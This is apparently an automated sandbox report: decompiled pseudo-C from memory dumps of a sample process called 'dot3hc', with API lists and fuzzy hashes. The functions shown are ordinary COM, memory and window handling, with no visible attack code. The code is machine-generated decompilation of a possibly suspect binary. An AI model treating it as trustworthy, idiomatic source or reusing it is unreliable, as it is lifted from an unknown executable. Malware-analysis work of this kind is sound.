                                                      				if( *((intOrPtr*)(__ecx + 0x48)) == 0) {
                                                      					_t138 =  *(__ecx + 8);
                                                      					__eflags = _t138;
                                                      					if(_t138 != 0) {
                                                      						_t215 =  &_a12;
                                                      						_t139 =  *((intOrPtr*)( *_t138 + 0xc))(_t138, 0x439330,  &_a12,  &_a8);
                                                      						__eflags = _t139;
                                                      						if(_t139 >= 0) {
                                                      							E00413D5B( &_a12,  &_a20, 0x439a5c);
                                                      							_a52 = _a52 | 0xffffffff;
                                                      							_a44 = 0;
                                                      							_a48 = 0;
                                                      							_a56 = 0x18;
                                                      							_a60 = 0;
                                                      							_a64 = 0x1fb;
                                                      							E00413D5B( &_a12,  &_a68, 0x439a44);
                                                      							_t145 = _a12;
                                                      							_a100 = _a100 | 0xffffffff;
                                                      							_t215 =  &_a20;
                                                      							_a92 = 0x1c;
                                                      							_a96 = 0;
                                                      							_a104 = 0x20;
                                                      							_a108 = 0;
                                                      							_a112 = 0x1e;
                                                      							_t183 =  *((intOrPtr*)( *_t145 + 0x10))(_t145, 2,  &_a20, 0x28, 0);
                                                      							__eflags = _t183;
                                                      							if(_t183 >= 0) {
                                                      								_t215 = 0;
                                                      								_v40 = _a8;
                                                      								_t148 = _a12;
                                                      								_v36 = 1;
                                                      								_v32 = 0;
                                                      								_v28 = 0;
                                                      								_v24 = 0;
                                                      								_t149 =  *((intOrPtr*)( *_t148 + 0x18))(_t148, 0, 0,  &_v40);
                                                      								__eflags = _t149;
                                                      								 *_t225 = _t149;
                                                      								if(_t149 >= 0) {
                                                      									 *((intOrPtr*)(_t222 + 0x14)) = _v32;
                                                      									_t151 = _v20;
                                                      									_a8 = _t151;
                                                      									 *(_t222 + 0x10) = _t151;
                                                      									_t152 = _a12;
                                                      									 *((intOrPtr*)(_t222 + 0x34)) = _v28;
                                                      									 *((intOrPtr*)( *_t152 + 8))(_t152);
                                                      									goto L32;
                                                      								} else {
                                                      									_t166 = _a12;
                                                      									 *((intOrPtr*)( *_t166 + 8))(_t166);
                                                      								}
                                                      								goto L50;
                                                      							} else {
                                                      								_t168 = _a12;
                                                      								 *((intOrPtr*)( *_t168 + 8))(_t168);
                                                      								_t139 = _t183;
                                                      							}
                                                      						}
                                                      					} else {
                                                      						_t139 = 0;
                                                      					}
                                                      					goto L51;
                                                      				} else {
                                                      					__eax =  *(__esi + 0x4c);
                                                      					__ecx =  *__eax;
                                                      					__edx =  &_a16;
                                                      					__eax =  *((intOrPtr*)(__ecx + 0x14))(__eax, 0x439540, __edx);
                                                      					__eflags = __eax;
                                                      					 *__ebp = __eax;
                                                      					if(__eax < 0) {
                                                      						L51:
                                                      						 *[fs:0x0] = _v12;
                                                      						_pop(_t220);
                                                      						_pop(_t223);
                                                      						_pop(_t182);
                                                      						_t140 = E0041E5DF(_t139, _t182, _a116 ^ _t225, _t215, _t220, _t223);
                                                      						__eflags =  &_a120;
                                                      						return _t140;
                                                      					} else {
                                                      						__eax = _a16;
                                                      						__ecx =  *__eax;
                                                      						__edx =  &_a8;
                                                      						_push( &_a8);
                                                      						_push(0x439520);
                                                      						_push(__eax);
                                                      						__eflags = __eax;
                                                      						if(__eflags >= 0) {
                                                      							__eax = _a8;
                                                      							__edx =  &_a12;
                                                      							_push( &_a12);
                                                      							_push(0x439660);
                                                      							_a12 = 0;
                                                      							__ecx =  *__eax;
                                                      							_push(__eax);
                                                      							__eflags = __eax;
                                                      							if(__eflags >= 0) {
                                                      								__eax = _a12;
                                                      								__ecx =  *__eax;
                                                      								__edx = __esi + 0x58;
                                                      								__edx =  *(__esi + 4);
                                                      								__edx =  *(__esi + 4) + 0xe8;
                                                      								__eflags = __edx;
                                                      								__eax =  *((intOrPtr*)( *__eax + 0x14))(__eax, __edx, __esi + 0x58);
                                                      								__eax = _a12;
                                                      								__ecx =  *__eax;
                                                      								__eax =  *((intOrPtr*)( *__eax + 8))(__eax);
                                                      							}
                                                      							__eax = _a8;
                                                      							__ecx =  *__eax;
                                                      							__eax =  *((intOrPtr*)( *__eax + 8))(__eax);
                                                      						}
                                                      						__eax = E00402EE1(__eflags, 0x14);
                                                      						__eflags = __eax - __edi;
                                                      						if(__eax == __edi) {
                                                      							__eax = 0;
                                                      							__eflags = 0;
                                                      						} else {
                                                      							__ecx = __eax;
                                                      							__eax = E00416B92(__eax, _a16);
                                                      						}
                                                      						 *(__esi + 0x50) = __eax;
                                                      						__eax = _a16;
                                                      						__ecx =  *__eax;
                                                      						__eax =  *((intOrPtr*)( *__eax + 8))(__eax);
                                                      						__eax =  *(__esi + 0x50);
                                                      						__ecx =  *__eax;
                                                      						__eflags =  *__eax - __edi;
                                                      						if(__eflags != 0) {
                                                      							__eflags = __eax;
                                                      							__eax = E00413F84(__ecx, __eax);
                                                      						}
                                                      						__eax = E00402EE1(__eflags, 0x28);
                                                      						__eflags = __eax - __edi;
                                                      						if(__eax == __edi) {
                                                      							__eax = 0;
                                                      							__eflags = 0;
                                                      						} else {
                                                      							__ecx = __eax;
                                                      							__eax = E00412BEB(__eax, __edi, 0x1f40);
                                                      						}
                                                      						__edx =  *(__esi + 0x50);
                                                      						 *(__esi + 0x54) = __eax;
                                                      						__ecx = __eax;
                                                      						__eax =  *(__esi + 0x54);
                                                      						__ecx =  *(__esi + 0x50);
                                                      						 *(__ecx + 8) =  *(__esi + 0x54);
                                                      						__eax =  *(__esi + 0x54);
                                                      						__eax =  *( *(__esi + 0x54) + 0xc);
                                                      						__eflags = __eax - 0x3333333;
                                                      						 *(__esi + 0x10) = __eax;
                                                      						if(__eax <= 0x3333333) {
                                                      							__eax = __eax * 0x28;
                                                      							__imp__CoTaskMemAlloc(__eax);
                                                      							__ecx = 0;
                                                      							__eflags = __eax - __edi;
                                                      							__ecx = 0 | __eflags != 0x00000000;
                                                      							 *(__esi + 0x14) = __eax;
                                                      							if(__eflags != 0) {
                                                      								 *(__esi + 0x10) =  *(__esi + 0x10) * 0x28;
                                                      								__eax = E0041F330(__edi, __eax, __edi,  *(__esi + 0x10) * 0x28);
                                                      								__ecx =  *(__esi + 0x50);
                                                      								__eax = E00416BB4( *(__esi + 0x50));
                                                      								__ecx =  *(__esi + 0x50);
                                                      								__eax = E00413F41(__ecx);
                                                      								L32:
                                                      								__eflags =  *(_t222 + 0x10);
                                                      								_a16 = 0;
                                                      								if( *(_t222 + 0x10) > 0) {
                                                      									_t187 = 0;
                                                      									__eflags = 0;
                                                      									do {
                                                      										_t163 = E00402EE1(__eflags, 0x1c);
                                                      										_a8 = _t163;
                                                      										__eflags = _t163;
                                                      										_v4 = 0;
                                                      										if(_t163 == 0) {
                                                      											_t164 = 0;
                                                      											__eflags = 0;
                                                      										} else {
                                                      											_t164 = E0041A1D8(_t163, 0xa);
                                                      										}
                                                      										_v4 = _v4 | 0xffffffff;
                                                      										_a16 = _a16 + 1;
                                                      										 *((intOrPtr*)(_t187 +  *((intOrPtr*)(_t222 + 0x14)) + 0x24)) = _t164;
                                                      										_t187 = _t187 + 0x28;
                                                      										__eflags = _a16 -  *(_t222 + 0x10);
                                                      									} while (__eflags < 0);
                                                      								}
                                                      								_t185 = _v16;
                                                      								__eflags = _t185;
                                                      								if(_t185 != 0) {
                                                      									__eflags = _a4;
                                                      									if(_a4 > 0) {
                                                      										_t154 = 0xffffffdc;
                                                      										_t186 = _t185 + 0x24;
                                                      										_a16 = _a4;
                                                      										_a8 = _t154 - _v16;
                                                      										while(1) {
                                                      											_t202 =  *( *_t186 + 4);
                                                      											__eflags = _t202;
                                                      											_a4 = _t202;
                                                      											if(_t202 == 0) {
                                                      												goto L46;
                                                      											}
                                                      											while(1) {
                                                      												_t158 = E00406B97( &_a4);
                                                      												_t215 =  *_t222;
                                                      												 *((intOrPtr*)( *_t222 + 8))( *_t158, 1);
                                                      												__eflags = _a4;
                                                      												if(_a4 == 0) {
                                                      													goto L46;
                                                      												}
                                                      											}
                                                      											L46:
                                                      											E0041A100( *_t186);
                                                      											_t204 =  *_t186;
                                                      											__eflags = _t204;
                                                      											if(_t204 != 0) {
                                                      												 *((intOrPtr*)( *_t204 + 4))(1);
                                                      											}
                                                      											_t186 =  &(_t186[0xa]);
                                                      											_t127 =  &_a16;
                                                      											 *_t127 = _a16 - 1;
                                                      											__eflags =  *_t127;
                                                      											if( *_t127 != 0) {
                                                      												continue;
                                                      											}
                                                      											goto L49;
                                                      										}
                                                      									}
                                                      									L49:
                                                      									__imp__CoTaskMemFree(_v16);
                                                      								}
                                                      								L50:
                                                      								_t139 =  *_t225;
                                                      								goto L51;
                                                      							} else {
                                                      								_push(_t225);
                                                      								_t228 = _t232;
                                                      								_push(_t188);
                                                      								 *((intOrPtr*)(_t228 - 4)) = 0x442350;
                                                      								E0041F7F4(_t228 - 4, 0x43c4ec);
                                                      								asm("int3");
                                                      								_push(_t228);
                                                      								_t229 = _t232;
                                                      								_push(_t188);
                                                      								_t10 = _t229 - 4; // 0x442350
                                                      								 *((intOrPtr*)(_t229 - 4)) = 0x4423e8;
                                                      								E0041F7F4(_t10, 0x43c54c);
                                                      								asm("int3");
                                                      								_push(_t229);
                                                      								_t230 = _t232;
                                                      								_push(_t188);
                                                      								_t12 = _t230 - 4; // 0x4423e8
                                                      								 *((intOrPtr*)(_t230 - 4)) = 0x442480;
                                                      								E0041F7F4(_t12, 0x43c590);
                                                      								asm("int3");
                                                      								_push(4);
                                                      								E0041F6EA(E00431BFC, _t181, 0, _t222);
                                                      								_t214 = E0040F014(0x104);
                                                      								 *((intOrPtr*)(_t230 - 0x10)) = _t214;
                                                      								_t179 = 0;
                                                      								 *((intOrPtr*)(_t230 - 4)) = 0;
                                                      								if(_t214 != 0) {
                                                      									_t179 = E0040D519(_t214);
                                                      								}
                                                      								return E0041F7C2(_t179);
                                                      							}
                                                      						} else {
                                                      							__eax = 0x8007000e;
                                                      							goto L51;
                                                      						}
                                                      					}
                                                      				}
                                                      			}




















































                                                      0x00417419
                                                      0x0041741e
                                                      0x0041741e
                                                      0x00417425
                                                      0x0041742a
                                                      0x0041742d
                                                      0x0041743e
                                                      0x0041743e
                                                      0x0041742f
                                                      0x00417435
                                                      0x00417437
                                                      0x00417437
                                                      0x00417440
                                                      0x00417443
                                                      0x00417448
                                                      0x0041744f
                                                      0x00417452
                                                      0x00417455
                                                      0x00417458
                                                      0x0041745b
                                                      0x0041745e
                                                      0x00417463
                                                      0x00417466
                                                      0x00417472
                                                      0x00417476
                                                      0x0041747c
                                                      0x0041747e
                                                      0x00417480
                                                      0x00417483
                                                      0x00417488
                                                      0x00417492
                                                      0x00417498
                                                      0x0041749d
                                                      0x004174a3
                                                      0x004174a8
                                                      0x004174ab
                                                      0x004175bc
                                                      0x004175bc
                                                      0x004175bf
                                                      0x004175c2
                                                      0x004175c4
                                                      0x004175c4
                                                      0x004175c6
                                                      0x004175c8
                                                      0x004175ce
                                                      0x004175d1
                                                      0x004175d3
                                                      0x004175d6
                                                      0x004175e3
                                                      0x004175e3
                                                      0x004175d8
                                                      0x004175dc
                                                      0x004175dc
                                                      0x004175e5
                                                      0x004175ec
                                                      0x004175ef
                                                      0x004175f6
                                                      0x004175f9
                                                      0x004175f9
                                                      0x004175c6
                                                      0x004175fe
                                                      0x00417601
                                                      0x00417603
                                                      0x00417605
                                                      0x00417608
                                                      0x0041760f
                                                      0x00417610
                                                      0x00417616
                                                      0x00417619
                                                      0x00417621
                                                      0x00417623
                                                      0x00417626
                                                      0x00417628
                                                      0x0041762b
                                                      0x00000000
                                                      0x00000000
                                                      0x00417632
                                                      0x0041763f
                                                      0x00417646
                                                      0x0041764d
                                                      0x00417650
                                                      0x00417653
                                                      0x00000000
                                                      0x00000000
                                                      0x0041762f
                                                      0x00417655
                                                      0x00417657
                                                      0x0041765c
                                                      0x0041765e
                                                      0x00417660
                                                      0x00417666
                                                      0x00417666
                                                      0x00417669
                                                      0x0041766c
                                                      0x0041766c
                                                      0x0041766c
                                                      0x0041766f
                                                      0x00000000
                                                      0x0041761e
                                                      0x00000000
                                                      0x0041766f
                                                      0x00417621
                                                      0x00417671
                                                      0x00417674
                                                      0x00417674
                                                      0x0041767a
                                                      0x0041767a
                                                      0x00000000
                                                      0x0041748a
                                                      0x004037af
                                                      0x004037b0
                                                      0x004037b2
                                                      0x004037bc
                                                      0x004037c3
                                                      0x004037c8
                                                      0x004037c9
                                                      0x004037ca
                                                      0x004037cc
                                                      0x004037d2
                                                      0x004037d6
                                                      0x004037dd
                                                      0x004037e2
                                                      0x004037e3
                                                      0x004037e4
                                                      0x004037e6
                                                      0x004037ec
                                                      0x004037f0
                                                      0x004037f7
                                                      0x004037fc
                                                      0x004037fd
                                                      0x00403804
                                                      0x00403813
                                                      0x00403815
                                                      0x00403818
                                                      0x0040381c
                                                      0x0040381f
                                                      0x00403821
                                                      0x00403821
                                                      0x0040382b
                                                      0x0040382b
                                                      0x00417468
                                                      0x00417468
                                                      0x00000000
                                                      0x00417468
                                                      0x00417466
                                                      0x0041738d

                                                      APIs
                                                      • __EH_prolog3.LIBCMT ref: 00417358
                                                      • CoTaskMemAlloc.OLE32(?,?), ref: 00417476
                                                      • _memset.LIBCMT ref: 00417498
                                                      • CoTaskMemFree.OLE32(?), ref: 00417674
                                                        • Part of subcall function 00402EE1: _malloc.LIBCMT ref: 00402EFB
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.613869877.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000003.00000002.613854761.0000000000400000.00000002.00020000.sdmp
                                                      • Associated: 00000003.00000002.613975412.0000000000434000.00000002.00020000.sdmp
                                                      • Associated: 00000003.00000002.614010074.0000000000442000.00000004.00020000.sdmp
                                                      • Associated: 00000003.00000002.614021943.0000000000446000.00000004.00020000.sdmp
                                                      • Associated: 00000003.00000002.614037174.0000000000449000.00000002.00020000.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_400000_dot3hc.jbxd
                                                      Similarity
                                                      • API ID: Task$AllocFreeH_prolog3_malloc_memset
                                                      • String ID:
                                                      • API String ID: 2459298410-0
                                                      • Opcode ID: 001287e20e2fc686fcc355d7d200779804c9778623c1a0276216663245252576
                                                      • Instruction ID: b46673a723d36e3b76cc53f0188287a817d86e82d50fda7b55772a3566616555
                                                      • Opcode Fuzzy Hash: 001287e20e2fc686fcc355d7d200779804c9778623c1a0276216663245252576
                                                      • Instruction Fuzzy Hash: 17C11A70604709AFCB14DF69C884AAAB7F5FF88314B20891EF816CB391D778E985CB54
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 70%
                                                      			E004181EB(void* __ebx, intOrPtr __ecx, void* __edi, void* __esi, void* __eflags) {
                                                      				intOrPtr* _t83;
                                                      				intOrPtr* _t84;
                                                      				intOrPtr _t85;
                                                      				intOrPtr* _t86;
                                                      				intOrPtr _t101;
                                                      				intOrPtr* _t121;
                                                      				intOrPtr* _t122;
                                                      				intOrPtr* _t124;
                                                      				intOrPtr* _t126;
                                                      				intOrPtr* _t128;
                                                      				intOrPtr* _t130;
                                                      				intOrPtr* _t145;
                                                      				intOrPtr* _t151;
                                                      				intOrPtr* _t160;
                                                      				intOrPtr _t161;
                                                      				intOrPtr _t162;
                                                      				void* _t163;
                                                      				void* _t164;
                                                      				intOrPtr _t166;
                                                      				intOrPtr* _t167;
                                                      				void* _t168;
                                                      				intOrPtr _t180;
                                                      
                                                      				_push(0x10);
                                                      				E0041F6EA(E004332B3, __ebx, __edi, __esi);
                                                      				_t166 = __ecx;
                                                      				 *((intOrPtr*)(_t168 - 0x1c)) = __ecx;
                                                      				 *((intOrPtr*)(__ecx)) = 0x436a4c;
                                                      				 *(_t168 - 4) = 0;
                                                      				if( *((intOrPtr*)(__ecx + 0x58)) == 0) {
                                                      					L11:
                                                      					while( *((intOrPtr*)(_t166 + 0x24)) != 0) {
                                                      						_t160 =  *((intOrPtr*)( *((intOrPtr*)(_t166 + 0x1c)) + 8));
                                                      						__eflags = _t160;
                                                      						if(_t160 == 0) {
                                                      							break;
                                                      						}
                                                      						_t151 =  *_t160;
                                                      						__eflags = _t151;
                                                      						if(_t151 == 0) {
                                                      							break;
                                                      						}
                                                      						 *((intOrPtr*)( *_t151 + 0xbc))( *((intOrPtr*)(_t160 + 8)), 0);
                                                      						 *((intOrPtr*)( *_t160 + 0x98)) = 0;
                                                      					}
                                                      					 *((intOrPtr*)(_t168 - 0x18)) = _t166 + 0x18;
                                                      					E0041A100(_t166 + 0x18);
                                                      					if( *((intOrPtr*)(_t166 + 0x40)) == 0) {
                                                      						L19:
                                                      						_t83 =  *((intOrPtr*)(_t166 + 8));
                                                      						if(_t83 != 0) {
                                                      							 *((intOrPtr*)( *_t83 + 8))(_t83);
                                                      						}
                                                      						_t84 =  *((intOrPtr*)(_t166 + 0xc));
                                                      						if(_t84 != 0) {
                                                      							 *((intOrPtr*)( *_t84 + 8))(_t84);
                                                      						}
                                                      						if( *((intOrPtr*)(_t166 + 0x14)) == 0) {
                                                      							L32:
                                                      							_t85 =  *((intOrPtr*)(_t166 + 0x34));
                                                      							if(_t85 != 0) {
                                                      								__imp__CoTaskMemFree(_t85);
                                                      							}
                                                      							_t136 =  *((intOrPtr*)(_t166 + 0x54));
                                                      							if( *((intOrPtr*)(_t166 + 0x54)) != 0) {
                                                      								E00416BFF(_t136,  *((intOrPtr*)( *((intOrPtr*)(_t166 + 0x50)))));
                                                      								E00412C14( *((intOrPtr*)(_t166 + 0x54)));
                                                      							}
                                                      							_t161 =  *((intOrPtr*)(_t166 + 0x54));
                                                      							_t192 = _t161;
                                                      							if(_t161 != 0) {
                                                      								E00412C14(_t161);
                                                      								_push(_t161);
                                                      								E00402F0C(0, _t161, _t166, _t192);
                                                      							}
                                                      							_t162 =  *((intOrPtr*)(_t166 + 0x50));
                                                      							_t193 = _t162;
                                                      							if(_t162 != 0) {
                                                      								E00417FCA(_t162, _t193);
                                                      								_push(_t162);
                                                      								E00402F0C(0, _t162, _t166, _t193);
                                                      							}
                                                      							_t86 =  *((intOrPtr*)(_t166 + 0x4c));
                                                      							if(_t86 != 0) {
                                                      								 *((intOrPtr*)( *_t86 + 8))(_t86);
                                                      							}
                                                      							_t167 =  *((intOrPtr*)(_t166 + 0x48));
                                                      							if(_t167 != 0) {
                                                      								 *((intOrPtr*)( *_t167 + 8))(_t167);
                                                      							}
                                                      							 *(_t168 - 4) =  *(_t168 - 4) | 0xffffffff;
                                                      							return E0041F7C2(E0041A1FB( *((intOrPtr*)(_t168 - 0x18))));
                                                      						} else {
                                                      							 *((intOrPtr*)(_t168 - 0x10)) = 0;
                                                      							if( *((intOrPtr*)(_t166 + 0x10)) <= 0) {
                                                      								L31:
                                                      								__imp__CoTaskMemFree( *((intOrPtr*)(_t166 + 0x14)));
                                                      								goto L32;
                                                      							}
                                                      							_t163 = 0;
                                                      							do {
                                                      								_t101 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t166 + 0x14)) + _t163 + 0x24)) + 4));
                                                      								 *((intOrPtr*)(_t168 - 0x14)) = _t101;
                                                      								if(_t101 == 0) {
                                                      									goto L28;
                                                      								} else {
                                                      									goto L27;
                                                      								}
                                                      								do {
                                                      									L27:
                                                      									 *((intOrPtr*)( *((intOrPtr*)(E00406B97(_t168 - 0x14))) + 0x98)) = 0;
                                                      								} while ( *((intOrPtr*)(_t168 - 0x14)) != 0);
                                                      								L28:
                                                      								E0041A100( *((intOrPtr*)( *((intOrPtr*)(_t166 + 0x14)) + _t163 + 0x24)));
                                                      								_t145 =  *((intOrPtr*)( *((intOrPtr*)(_t166 + 0x14)) + _t163 + 0x24));
                                                      								if(_t145 != 0) {
                                                      									 *((intOrPtr*)( *_t145 + 4))(1);
                                                      								}
                                                      								 *((intOrPtr*)(_t168 - 0x10)) =  *((intOrPtr*)(_t168 - 0x10)) + 1;
                                                      								_t163 = _t163 + 0x28;
                                                      							} while ( *((intOrPtr*)(_t168 - 0x10)) <  *((intOrPtr*)(_t166 + 0x10)));
                                                      							goto L31;
                                                      						}
                                                      					}
                                                      					_t164 = 0;
                                                      					if( *((intOrPtr*)(_t166 + 0x38)) <= 0) {
                                                      						L17:
                                                      						if(_t180 != 0) {
                                                      							_push( *((intOrPtr*)(_t166 + 0x3c)));
                                                      							E00402F0C(0, _t164, _t166, _t180);
                                                      							_push( *((intOrPtr*)(_t166 + 0x40)));
                                                      							E00402F0C(0, _t164, _t166, _t180);
                                                      						}
                                                      						goto L19;
                                                      					}
                                                      					 *((intOrPtr*)(_t168 - 0x10)) = 0;
                                                      					do {
                                                      						__imp__#9( *((intOrPtr*)(_t166 + 0x40)) +  *((intOrPtr*)(_t168 - 0x10)));
                                                      						 *((intOrPtr*)(_t168 - 0x10)) =  *((intOrPtr*)(_t168 - 0x10)) + 0x10;
                                                      						_t164 = _t164 + 1;
                                                      					} while (_t164 <  *((intOrPtr*)(_t166 + 0x38)));
                                                      					_t180 =  *((intOrPtr*)(_t166 + 0x38));
                                                      					goto L17;
                                                      				}
                                                      				_t121 =  *((intOrPtr*)(__ecx + 0x50));
                                                      				if(_t121 == 0) {
                                                      					goto L11;
                                                      				}
                                                      				_t122 =  *_t121;
                                                      				_push(_t168 - 0x14);
                                                      				_push(0x439520);
                                                      				_push(_t122);
                                                      				if( *((intOrPtr*)( *_t122))() < 0) {
                                                      					goto L11;
                                                      				}
                                                      				_t124 =  *((intOrPtr*)(_t168 - 0x14));
                                                      				if(_t124 == 0) {
                                                      					goto L11;
                                                      				}
                                                      				_push(_t168 - 0x10);
                                                      				_push(0x439660);
                                                      				 *((intOrPtr*)(_t168 - 0x10)) = 0;
                                                      				_push(_t124);
                                                      				if( *((intOrPtr*)( *_t124 + 0x10))() >= 0) {
                                                      					_t128 =  *((intOrPtr*)(_t168 - 0x10));
                                                      					if(_t128 != 0) {
                                                      						 *((intOrPtr*)( *_t128 + 0x18))(_t128,  *((intOrPtr*)(__ecx + 0x58)));
                                                      						_t130 =  *((intOrPtr*)(_t168 - 0x10));
                                                      						 *((intOrPtr*)( *_t130 + 8))(_t130);
                                                      					}
                                                      				}
                                                      				_t126 =  *((intOrPtr*)(_t168 - 0x14));
                                                      				 *((intOrPtr*)( *_t126 + 8))(_t126);
                                                      				goto L11;
                                                      			}

























                                                      0x00418304
                                                      0x00418306
                                                      0x0041830d
                                                      0x00418312
                                                      0x00418315
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x00418317
                                                      0x00418317
                                                      0x0041832c
                                                      0x0041832c
                                                      0x00418334
                                                      0x0041833b
                                                      0x00418343
                                                      0x00418349
                                                      0x0041834f
                                                      0x0041834f
                                                      0x00418352
                                                      0x00418358
                                                      0x0041835b
                                                      0x00000000
                                                      0x00418306
                                                      0x004182fa
                                                      0x004182a5
                                                      0x004182aa
                                                      0x004182c9
                                                      0x004182c9
                                                      0x004182cb
                                                      0x004182ce
                                                      0x004182d3
                                                      0x004182d6
                                                      0x004182dc
                                                      0x00000000
                                                      0x004182c9
                                                      0x004182ac
                                                      0x004182af
                                                      0x004182b6
                                                      0x004182bc
                                                      0x004182c0
                                                      0x004182c1
                                                      0x004182c6
                                                      0x00000000
                                                      0x004182c6
                                                      0x00418210
                                                      0x00418215
                                                      0x00000000
                                                      0x00000000
                                                      0x00418217
                                                      0x0041821e
                                                      0x0041821f
                                                      0x00418224
                                                      0x00418229
                                                      0x00000000
                                                      0x00000000
                                                      0x0041822b
                                                      0x00418230
                                                      0x00000000
                                                      0x00000000
                                                      0x00418235
                                                      0x00418236
                                                      0x0041823b
                                                      0x00418240
                                                      0x00418246
                                                      0x00418248
                                                      0x0041824d
                                                      0x00418255
                                                      0x00418258
                                                      0x0041825e
                                                      0x0041825e
                                                      0x0041824d
                                                      0x00418261
                                                      0x00418267
                                                      0x00000000

                                                      APIs
                                                      • __EH_prolog3.LIBCMT ref: 004181F2
                                                      • VariantClear.OLEAUT32(?), ref: 004182B6
                                                      • CoTaskMemFree.OLE32(?,00000010), ref: 00418363
                                                      • CoTaskMemFree.OLE32(?,00000010), ref: 00418371
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.613869877.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000003.00000002.613854761.0000000000400000.00000002.00020000.sdmp
                                                      • Associated: 00000003.00000002.613975412.0000000000434000.00000002.00020000.sdmp
                                                      • Associated: 00000003.00000002.614010074.0000000000442000.00000004.00020000.sdmp
                                                      • Associated: 00000003.00000002.614021943.0000000000446000.00000004.00020000.sdmp
                                                      • Associated: 00000003.00000002.614037174.0000000000449000.00000002.00020000.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_400000_dot3hc.jbxd
                                                      Similarity
                                                      • API ID: FreeTask$ClearH_prolog3Variant
                                                      • String ID:
                                                      • API String ID: 365290523-0
                                                      • Opcode ID: f43a4734b95fc7b9ba13739095310105ed9ff544ff7f9a3fcef366ab354341a4
                                                      • Instruction ID: 59d339b82a7be658d62f54fd823bf36d6654d79d954229c5207d740f0b8cb97e
                                                      • Opcode Fuzzy Hash: f43a4734b95fc7b9ba13739095310105ed9ff544ff7f9a3fcef366ab354341a4
                                                      • Instruction Fuzzy Hash: FD713871A00A069FCB20DFA5C9C49AEB7F1BF48304724096EE556DB661CB39EC81CB58
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      • IsBadHugeReadPtr.KERNEL32(00000000,00000014), ref: 022E21F9
                                                      • SetLastError.KERNEL32(0000007E), ref: 022E223B
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.615064004.00000000022E1000.00000020.00000001.sdmp, Offset: 022E1000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_22e1000_dot3hc.jbxd
                                                      Similarity
                                                      • API ID: ErrorHugeLastRead
                                                      • String ID:
                                                      • API String ID: 3239643929-0
                                                      • Opcode ID: 2958ae34cc9a1878924351eb8dc68cb06be18fae96916e0f37081bb55cf001f5
                                                      • Instruction ID: bda8353d5a9e7c8d07df6a302c66c5f4b371bb5ead888de839b58fac594719fe
                                                      • Opcode Fuzzy Hash: 2958ae34cc9a1878924351eb8dc68cb06be18fae96916e0f37081bb55cf001f5
                                                      • Instruction Fuzzy Hash: 7281B974A10209DFDB04CF94C894BAEBBB5FF48314F548698E90AAB355C774EA81DF90
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 34%
                                                      			E00417E15(signed int __ecx, void* __edx) {
                                                      				signed int _v8;
                                                      				signed int _v12;
                                                      				void* _v16;
                                                      				signed int _v20;
                                                      				signed int _v24;
                                                      				struct tagRECT _v40;
                                                      				struct tagRECT _v56;
                                                      				char _v76;
                                                      				intOrPtr _v88;
                                                      				void* __ebx;
                                                      				void* __edi;
                                                      				void* __esi;
                                                      				void* __ebp;
                                                      				intOrPtr _t63;
                                                      				signed int _t64;
                                                      				intOrPtr _t70;
                                                      				signed int _t72;
                                                      				signed int _t73;
                                                      				signed int _t75;
                                                      				intOrPtr* _t77;
                                                      				signed int _t78;
                                                      				intOrPtr* _t80;
                                                      				signed int _t81;
                                                      				intOrPtr* _t82;
                                                      				intOrPtr* _t84;
                                                      				signed int _t86;
                                                      				signed int _t88;
                                                      				signed int _t92;
                                                      				intOrPtr* _t99;
                                                      				signed int _t100;
                                                      				signed int _t126;
                                                      				intOrPtr _t127;
                                                      				void* _t144;
                                                      				void* _t147;
                                                      				intOrPtr* _t148;
                                                      				signed int** _t150;
                                                      				signed int* _t151;
                                                      				signed int _t154;
                                                      				signed int _t156;
                                                      				void* _t158;
                                                      				void* _t161;
                                                      
                                                      				_t144 = __edx;
                                                      				_t126 = __ecx;
                                                      				_t158 = _t161;
                                                      				_t154 = __ecx;
                                                      				_t63 =  *((intOrPtr*)(__ecx + 4));
                                                      				_push(_t147);
                                                      				if(_t63 != 0) {
                                                      					_t64 =  *(_t63 + 0x28);
                                                      					__eflags = _t64;
                                                      					if(_t64 == 0) {
                                                      						goto L4;
                                                      					} else {
                                                      						_t126 = _t64;
                                                      						_t72 = E0040AF65(0, _t126, _t147);
                                                      						__eflags = _t72;
                                                      						_v8 = _t72;
                                                      						if(_t72 == 0) {
                                                      							goto L4;
                                                      						} else {
                                                      							_t73 = IsWindowVisible( *(_t72 + 0x20));
                                                      							asm("sbb eax, eax");
                                                      							_t75 =  ~_t73 + 1;
                                                      							__eflags = _t75;
                                                      							_v24 = _t75;
                                                      							if(_t75 != 0) {
                                                      								GetWindowRect( *(E00409C97(0, _t126, _t158, GetDesktopWindow()) + 0x20),  &_v56);
                                                      								GetWindowRect( *(_v8 + 0x20),  &_v40);
                                                      								asm("cdq");
                                                      								asm("cdq");
                                                      								__eflags = _v56.right - _v56.left - _t144;
                                                      								E0040CA11(_v8, _v56.right - _v56.left - _t144 >> 1, _v56.bottom - _v56.top - _t144 >> 1, 0, 0, 0);
                                                      								E0040CA4F(_v8, 1);
                                                      							}
                                                      							_t77 =  *((intOrPtr*)( *((intOrPtr*)(_t154 + 4)) + 0x50));
                                                      							_t148 = _t154 + 0x48;
                                                      							_t78 =  *((intOrPtr*)( *_t77))(_t77, 0x4369e0, _t148);
                                                      							__eflags = _t78;
                                                      							if(_t78 < 0) {
                                                      								_t80 =  *((intOrPtr*)( *((intOrPtr*)(_t154 + 4)) + 0x50));
                                                      								_t81 =  *((intOrPtr*)( *_t80))(_t80, 0x436a38,  &_v16);
                                                      								__eflags = _t81;
                                                      								if(_t81 >= 0) {
                                                      									_t82 = _v16;
                                                      									 *((intOrPtr*)( *_t82 + 0x14))(_t82,  &_v20);
                                                      									_t84 = _v16;
